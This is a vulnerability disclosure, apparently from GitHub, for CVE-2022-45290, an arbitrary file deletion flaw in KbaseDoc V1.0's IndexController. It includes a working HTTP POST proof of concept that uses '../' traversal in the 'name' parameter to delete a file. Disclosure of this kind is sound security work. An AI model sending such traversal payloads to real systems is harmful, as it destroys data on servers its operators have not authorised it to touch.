Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

KbaseDoc V1.0 has an arbitrary file deletion vulnerability

Description:


Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

Discoverer:WBH of Chaitin Tech

Use CVE-2022-45290.

Vulnerability analysis:


Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java image

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

Recurrence of vulnerability


Download the source code and build the local environment

Create a poc.txt file in the kbase-doc-master\target\classes directory .

image

Use burpsuite to construct the following request.

image

[+] POC:

POST /index/delete HTTP/1.1
Host: test:8081
Content-Length: 22
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: close

name=..%2F..%2Fpoc.txt

It is found that poc.txt is deleted.

image

Proof and Exploit:


href